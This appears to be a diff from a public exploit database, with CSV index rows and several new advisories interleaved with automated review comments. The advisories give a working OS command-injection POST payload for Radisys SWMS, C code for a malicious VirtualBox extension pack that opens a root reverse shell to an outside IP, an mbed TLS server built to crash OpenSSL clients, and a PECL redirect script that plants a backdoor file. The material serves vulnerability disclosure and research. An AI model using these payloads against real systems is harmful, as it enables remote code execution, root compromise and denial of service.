39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0
39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0
39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21
@ -16057,7 +16059,7 @@ id,file,description,date,author,platform,type,port
1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0
1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0
1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0
1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0
1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0
1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0
1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0
1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0
@ -17056,7 +17058,7 @@ id,file,description,date,author,platform,type,port
2862,platforms/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0
2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0
2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - 'import-mt.php' Remote File Inclusion",2006-11-29,tarkus,php,webapps,0
2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution",2006-11-30,rgod,php,webapps,0
2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
2871,platforms/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0
2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0
@ -22479,7 +22481,7 @@ id,file,description,date,author,platform,type,port
11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0
11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0
11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0
11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
11442,platforms/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
@ -37102,7 +37104,7 @@ id,file,description,date,author,platform,type,port
41155,platforms/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",php,webapps,0
41156,platforms/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",php,webapps,0
41157,platforms/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",php,webapps,0
41159,platforms/php/webapps/41159.txt,"Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
41159,platforms/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
41166,platforms/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
41167,platforms/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
41168,platforms/php/webapps/41168.txt,"KB Messages PHP Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
@ -37112,7 +37114,25 @@ id,file,description,date,author,platform,type,port
41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41179,platforms/cgi/webapps/41179.txt,"Radisys MRF - Command Injection",2017-01-27,"Filippos Mastrogiannis",cgi,webapps,0
41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0
41185,platforms/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,php,webapps,0
41186,platforms/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41187,platforms/php/webapps/41187.txt,"Auction Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41188,platforms/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41189,platforms/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41190,platforms/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41191,platforms/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41193,platforms/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41195,platforms/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41197,platforms/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
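Review bot: the description of 41179, "Radisys MRF - Command Injection", omits the product name, version and CVE that the advisory added in this same commit states (MRF Web Panel (SWMS), version 9.0.1, CVE-2016-10043); nearly every other entry in this hunk carries a version, so "Radisys MRF Web Panel (SWMS) 9.0.1 - Command Injection" would match the house style and make the entry findable by product.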

@ -1,4 +1,6 @@
#
# Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb
#
# Remote code execution in NETGEAR WNR2000v5
# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
# Released on 20/12/2016

platforms/cgi/webapps/41179.txt Executable file
@ -0,0 +1,78 @@
Title: MRF Web Panel OS Command Injection
Vendor: Radisys
Vendor Homepage: http://www.radisys.com
Product: MRF Web Panel (SWMS)
Version: 9.0.1
CVE: CVE-2016-10043
CWE: CWE-78
Risk Level: High
Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
COSMOTE (OTE Group) Information & Network Security
-----------------------------------------------------------------------------------------
Vulnerability Details:
The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection
attacks.
Affected parameter: MSM_MACRO_NAME (POST parameter)
Affected file: ms.cgi (/swms/ms.cgi)
Verified Affected Operation: Show Fatal Error and Log Package Configuration
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses.
Proof Of Concept:
The attacker can login to the web panel as a standard user (non-administrator account)
and inject the POST parameter: MSM_MACRO_NAME with the following
payload: Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
As a result the attacker receives the result of the command in the application response
In order to reproduce the vulnerability:
1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator):
https://vulnsite.com/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id
and send the following POST request in order to retrieve the output of the 'pwd' command:
POST /swms/ms.cgi HTTP/1.1
Host: vulnhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vulnsite/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
3. You can see the output of the command 'pwd' in the server response:
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23
/var/opt/swms/www/html
Vulnerability Impact:
Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.
Disclaimer:
The responsible disclosure policy has been followed
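Review bot: the advisory carries no fix information: the header block lists CVE, CWE and risk level but no vendor advisory, patched SWMS version or workaround, and "The responsible disclosure policy has been followed" is the only hint that the vendor was involved. A "Solution" line (patched version, or at minimum "restrict access to the /swms panel to trusted networks until patched") is what an operator searching by CVE-2016-10043 needs most, and the note that a standard, non-administrator account is sufficient belongs next to it, since it means every panel user is in scope. A smaller point in the PoC: the Host header reads "vulnhost" while step 1 and the Referer use "vulnsite", so both should be marked as the same placeholder to be replaced.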

platforms/linux/local/41196.txt Executable file
@ -0,0 +1,192 @@
== [ Overview ] ===
System affected: VirtualBox
Software-Version: prior to 5.0.32, prior to 5.1.14
User-Interaction: Required
Impact: A Man-In-The-Middle could infiltrate an
Extension-Pack-Update to gain a root-shell
=== [ Detailed description ] ===
In my research about update mechanism of open-source software I found
vulnerabilities in Oracle's VirtualBox. It's possible to compromise a
system behind a firewall by infiltrating the updates of Extension-Packs
because of the following flaws:
1. The Extension-Pack is updated via HTTP instead of HTTPS. The
Extension-Packs are not signed, so a Man-In-The-Middle could send his
own Extension-Pack(with malicious code included) instead of the regular
update to the target. The Code would be executed with user-permissions.
I reported this bug to Oracle but I think someone else discovered and
reported it before. This bug also affects VirtualBox prior to 5.0.32,
prior to 5.1.14. I don't know the CVE.
2. CVE-2017-3316: There is a privilege escalation bug in the downloader
of VirtualBox. Extension-Packs are tar-archives. Tar-archives can
preserve permissions. A Man-In-The-Middle could include an executable
with setuid-permissions to the Extension-Pack. If the victim downloads
the Ext-pack, it will be stored as owner root and without checking the
permissions of the binaries. This bug affects VirtualBox prior to
5.0.32, prior to 5.1.14
=== [ Proof-Of-Concept ] ===
The executeable of the following code is placed in the
Extension-Pack-Archive under linux.amd64/evil with setuid.
/* evil.c(executable with the reverse-shell) */
#include <unistd.h>
int main()
{
setuid(0);
execl("/usr/bin/python","python","-c","import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.12.32.15\",5000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);",NULL);
return 0;
}
The VirtualBox-Sources are downloaded next and the following code has
to be placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp:
/* $Id: VBoxEvilMain.cpp $ */
/** @file
* Evil main module.
*/
/*
* Copyright (C) 2010-2016 Oracle Corporation
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use,
* copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following
* conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
* OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
* HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
* OTHER DEALINGS IN THE SOFTWARE.
*/
#include <VBox/ExtPack/ExtPack.h>
#include <VBox/err.h>
#include <VBox/version.h>
#include <VBox/vmm/cfgm.h>
#include <iprt/string.h>
#include <iprt/param.h>
#include <iprt/path.h>
static PCVBOXEXTPACKHLP g_pHlp;
static const VBOXEXTPACKREG g_vboxEvilExtPackReg =
{
VBOXEXTPACKREG_VERSION,
/* .uVBoxFullVersion = */ VBOX_FULL_VERSION,
/* .pfnInstalled = */ NULL,
/* .pfnUninstall = */ NULL,
/* .pfnVirtualBoxReady =*/ NULL,
/* .pfnConsoleReady = */ NULL,
/* .pfnUnload = */ NULL,
/* .pfnVMCreated = */ NULL,
/* .pfnVMConfigureVMM = */ NULL,
/* .pfnVMPowerOn = */ NULL,
/* .pfnVMPowerOff = */ NULL,
/* .pfnQueryObject = */ NULL,
/* .pfnReserved1 = */ NULL,
/* .pfnReserved2 = */ NULL,
/* .pfnReserved3 = */ NULL,
/* .pfnReserved4 = */ NULL,
/* .pfnReserved5 = */ NULL,
/* .pfnReserved6 = */ NULL,
/* .u32Reserved7 = */ 0,
VBOXEXTPACKREG_VERSION
};
#include <unistd.h>
/** @callback_method_impl{FNVBOXEXTPACKREGISTER} */
extern "C" DECLEXPORT(int) VBoxExtPackRegister(PCVBOXEXTPACKHLP pHlp,
PCVBOXEXTPACKREG *ppReg, PRTERRINFO pErrInfo)
{
pid_t pid = fork();
if(pid == 0)
{
execl("/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil","evil",NULL);
}
/*
* Check the VirtualBox version.
*/
if (!VBOXEXTPACK_IS_VER_COMPAT(pHlp->u32Version,
VBOXEXTPACKHLP_VERSION))
return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
"Helper version mismatch - expected %#x got
%#x",
VBOXEXTPACKHLP_VERSION, pHlp->u32Version);
if ( VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion) !=
VBOX_VERSION_MAJOR
|| VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion) !=
VBOX_VERSION_MINOR)
return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
"VirtualBox version mismatch - expected
%u.%u got %u.%u",
VBOX_VERSION_MAJOR, VBOX_VERSION_MINOR,
VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion),
VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion));
/*
* We're good, save input and return the registration structure.
*/
g_pHlp = pHlp;
*ppReg = &g_vboxEvilExtPackReg;
return VINF_SUCCESS;
}
After compiling, this Extension-Pack-Module is placed in the Archive
under linux.amd64/VBoxEvilMain.so. It's also necessary to modify the
ExtPack.xml so that the Evil-Module is used:
<!--?xml version="1.0"?-->
<virtualboxextensionpack version="1.0"
xmlns="http://www.virtualbox.org/VirtualBoxExtensionPack";>
<name>Oracle VM VirtualBox Extension Pack</name>
<description>USB 2.0 and USB 3.0 Host Controller, Host Webcam,
VirtualBox RDP, PXE ROM, Disk Encryption.</description>
<version revision="112026">5.1.10</version>
<mainmodule>VBoxEvilMain</mainmodule>
<vrdemodule>VBoxVRDP</vrdemodule>
<showlicense>
</showlicense></virtualboxextensionpack>
Note: To make this Extension-Pack valid it is necessary to add all the
file-checksumms to ExtPack.manifest. The victim will be asked for the
root password during the update. If the attacker sends this malicious
Extension-Pack, a reverse root-shell will be executed.
=== [ Timeline ] ===
This bug was reported in December. Oracle answered on the same day and
gave status reports regularly. They released a patch on January 17th.
=== [ Credits ] ===
CVE-2017-3316 was discovered by Wolfgang Hotwagner
(https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316)
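Review bot: the ExtPack.xml fragment is not valid XML as reproduced: the declaration has become a comment (`<!--?xml version="1.0"?-->`) and the `xmlns` value carries a stray `;` after its closing quote, so the snippet will not parse; restore `<?xml version="1.0"?>` and drop the semicolon. The two `RTErrInfoSetF` format strings in VBoxExtPackRegister are also wrapped mid-literal ("expected %#x got / %#x" and "expected / %u.%u got %u.%u"), which looks like extraction damage rather than the author's code and would not compile as shown. The Timeline says Oracle released a patch on January 17th but never names the fixed VirtualBox release; if a Solution section does not already give it, add the fixed version so readers can check their installations against the 5.1.10 shown in the pack descriptor.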

platforms/multiple/dos/41192.c Executable file
@ -0,0 +1,212 @@
// Source: https://guidovranken.wordpress.com/2017/01/26/cve-2017-3730-openssl-1-1-0-remote-client-denial-of-service-affects-servers-as-well-poc/
/*
* SSL server demonstration program
*
* Copyright (C) 2006-2015, ARM Limited, All Rights Reserved
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* This file is part of mbed TLS (https://tls.mbed.org)
*/
/* Taken from mbed TLS programs/ssl/ssl_server.c and modified to crash postfix.
* Belongs to https://github.com/guidovranken/CVE-2017-3730
*/
#include <stdlib.h>
#include <string.h>
#include "mbedtls/entropy.h"
#include "mbedtls/ctr_drbg.h"
#include "mbedtls/certs.h"
#include "mbedtls/x509.h"
#include "mbedtls/ssl.h"
#include "mbedtls/net_sockets.h"
#include "mbedtls/error.h"
#include "mbedtls/debug.h"
static int write_and_get_response( mbedtls_net_context *sock_fd, char *buf, size_t len )
{
int ret;
if ( (ret = mbedtls_net_send( sock_fd, (unsigned char*)buf, strlen(buf) )) <= 0 )
{
return -1;
}
memset( buf, 0, len );
ret = mbedtls_net_recv( sock_fd, (unsigned char*)buf, len );
return ret;
}
int main( void )
{
int ret;
mbedtls_net_context listen_fd, client_fd;
char buf[1024];
const char *pers = "ssl_server";
int force_ciphersuite[2];
mbedtls_entropy_context entropy;
mbedtls_ctr_drbg_context ctr_drbg;
mbedtls_ssl_context ssl;
mbedtls_ssl_config conf;
mbedtls_x509_crt srvcert;
mbedtls_pk_context pkey;
mbedtls_net_init( &listen_fd );
mbedtls_net_init( &client_fd );
mbedtls_ssl_init( &ssl );
mbedtls_ssl_config_init( &conf );
mbedtls_x509_crt_init( &srvcert );
mbedtls_pk_init( &pkey );
mbedtls_entropy_init( &entropy );
mbedtls_ctr_drbg_init( &ctr_drbg );
ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_srv_crt,
mbedtls_test_srv_crt_len );
if( ret != 0 )
{
goto exit;
}
ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_cas_pem,
mbedtls_test_cas_pem_len );
if( ret != 0 )
{
goto exit;
}
ret = mbedtls_pk_parse_key( &pkey, (const unsigned char *) mbedtls_test_srv_key,
mbedtls_test_srv_key_len, NULL, 0 );
if( ret != 0 )
{
goto exit;
}
if( ( ret = mbedtls_net_bind( &listen_fd, NULL, "8888", MBEDTLS_NET_PROTO_TCP ) ) != 0 )
{
goto exit;
}
if( ( ret = mbedtls_ctr_drbg_seed( &ctr_drbg, mbedtls_entropy_func, &entropy,
(const unsigned char *) pers,
strlen( pers ) ) ) != 0 )
{
goto exit;
}
if( ( ret = mbedtls_ssl_config_defaults( &conf,
MBEDTLS_SSL_IS_SERVER,
MBEDTLS_SSL_TRANSPORT_STREAM,
MBEDTLS_SSL_PRESET_DEFAULT ) ) != 0 )
{
goto exit;
}
mbedtls_ssl_conf_rng( &conf, mbedtls_ctr_drbg_random, &ctr_drbg );
mbedtls_ssl_conf_ca_chain( &conf, srvcert.next, NULL );
if( ( ret = mbedtls_ssl_conf_own_cert( &conf, &srvcert, &pkey ) ) != 0 )
{
goto exit;
}
force_ciphersuite[0] = mbedtls_ssl_get_ciphersuite_id( "TLS-DHE-RSA-WITH-AES-256-GCM-SHA384" );
force_ciphersuite[1] = 0;
mbedtls_ssl_conf_ciphersuites( &conf, force_ciphersuite );
if( ( ret = mbedtls_ssl_setup( &ssl, &conf ) ) != 0 )
{
goto exit;
}
reset:
mbedtls_net_free( &client_fd );
mbedtls_ssl_session_reset( &ssl );
if( ( ret = mbedtls_net_accept( &listen_fd, &client_fd,
NULL, 0, NULL ) ) != 0 )
{
goto exit;
}
sprintf(buf, "220 ok\n");
ret = write_and_get_response( &client_fd, buf, sizeof(buf));
if ( ret < 5 ) {
goto exit;
}
if ( strncmp(buf, "EHLO ", 5) != 0 ) {
goto exit;
}
sprintf(buf, "250-SIZE 157286400\n250-8BITMIME\n250-STARTTLS\n250-ENHANCEDSTATUSCODES\n250-PIPELINING\n250-CHUNKING\n250 SMTPUTF8\n");
ret = write_and_get_response( &client_fd, buf, sizeof(buf));
if ( ret < 8 ) {
goto exit;
}
if ( strncmp(buf, "STARTTLS", 8) != 0 ) {
goto exit;
}
sprintf(buf, "220 ok\n");
ret = mbedtls_net_send( &client_fd, (unsigned char*)buf, strlen(buf) );
if ( ret < 0 ) {
goto exit;
}
mbedtls_ssl_set_bio( &ssl, &client_fd, mbedtls_net_send, mbedtls_net_recv, NULL );
while( ( ret = mbedtls_ssl_handshake( &ssl ) ) != 0 )
{
if( ret != MBEDTLS_ERR_SSL_WANT_READ && ret != MBEDTLS_ERR_SSL_WANT_WRITE )
{
goto reset;
}
}
while( ( ret = mbedtls_ssl_close_notify( &ssl ) ) < 0 )
{
if( ret != MBEDTLS_ERR_SSL_WANT_READ &&
ret != MBEDTLS_ERR_SSL_WANT_WRITE )
{
goto reset;
}
}
ret = 0;
goto reset;
exit:
mbedtls_net_free( &client_fd );
mbedtls_net_free( &listen_fd );
mbedtls_x509_crt_free( &srvcert );
mbedtls_pk_free( &pkey );
mbedtls_ssl_free( &ssl );
mbedtls_ssl_config_free( &conf );
mbedtls_ctr_drbg_free( &ctr_drbg );
mbedtls_entropy_free( &entropy );
return( ret );
}
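Review bot: nothing in this file documents where the client crash is produced: the server only forces TLS-DHE-RSA-WITH-AES-256-GCM-SHA384 and then runs a stock mbed TLS handshake, so whatever triggers the fault must come from the modified library that the comment "Belongs to https://github.com/guidovranken/CVE-2017-3730" refers to. Add a header comment naming that dependency and how to build against it; linked against an unmodified mbed TLS this is a harmless SMTP/STARTTLS listener, and a reader cannot tell whether "no crash" means a patched OpenSSL client or the wrong library. Smaller points: `sprintf` is used without `#include <stdio.h>`, and `write_and_get_response` passes the full `len` to `mbedtls_net_recv`, so a 1024-byte read leaves `buf` without a terminating NUL (the two `strncmp` calls are length-bounded, so this is latent rather than harmful here).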

platforms/php/webapps/41185.txt Executable file
@ -0,0 +1,140 @@
[+]#############################################################################################
[+] Credits / Discovery: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt
[+] ISR: ApparitionSEC
[+]#############################################################################################
Vendor:
============
pear.php.net
Product:
===================================
PEAR Base System v1.10.1
PEAR Installer's download utility
Vulnerability Type:
=======================
Arbitrary File Download
CVE Reference:
==============
CVE-2017-5630
Security Issue:
================
The download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect,
which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.
e.g.
pecl download <http://some-vuln-server/file.tgz>
PEAR does not rename the arbitrary invalid file to the originally requested (safe) filename.
Therefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc..
Moreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers
can force the HTTP connection to stay open, and before a "invalid file message" is noticed.
POC Video:
https://vimeo.com/201341280
Proof of concept:
This POC involves 3 machines:
First machine is victim making a PECL download command request
Second is the vuln server receiving the file download request
Third is the malicious server hosting the PHP backdoor, .htaccess file etc.
===========================================================================
1) Victim machine attempts to download a legit ".tgz" archive.
pecl download http://VULN-SERVER:8080/Test.tgz
2) VULN-SERVER where the victim is requesting "Test.tgz", and attacker controls HTTP response.
3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor.
python -m SimpleHTTPServer 8888
On VULN-SERVER run "PECL-File-Exploit.py"
python PECL-File-Exploit.py
import socket
HOST='localhost'
PORT=8080
TARGET='http://EVIL-SERVER:8888/'
FILE='.htaccess'
s = socket.socket()
s.bind((HOST, PORT))
s.listen(10)
print 'Waiting for PECL connections...'
while True:
conn, addr = s.accept()
junk = conn.recv(512)
conn.send('HTTP/1.1 302 Found\r\n')
conn.send('Location: '+TARGET+FILE+'\r\n')
conn.close()
s.close()
Then, make request for Test.tgz...
C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz
downloading Evil.php ...
Starting to download Evil.php (4,665 bytes)
.....done: 4,665 bytes
File C:\xampp\htdocs\webapp\Evil.php downloaded
Disclosure Timeline:
=====================================
Vendor Notification: January 11, 2017
Informed "PECL package no longer maintained" : January 23, 2017
Opened Bug #2117 : January 25, 2017
January 29, 2017 : Public Disclosure
Network Access:
================
Remote
Severity:
=========
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
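Review bot: the script and the transcript disagree about what was demonstrated: `FILE='.htaccess'` is hard-coded in PECL-File-Exploit.py, yet the pecl output that follows shows Evil.php being written to C:\xampp\htdocs\webapp, so state which redirect target produced the transcript (or show both runs). In the script, `s.close()` after `while True:` is unreachable and the `print` statements are Python 2 only, which the entry should say. Finally, the Disclosure Timeline records only that the PECL package is "no longer maintained"; say plainly whether any fixed version exists, since that is the one fact an operator reading this entry needs.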

platforms/php/webapps/41186.txt Executable file
@ -0,0 +1,23 @@
Exploit Title: Caregiver Script v2.57 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/caregiver-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
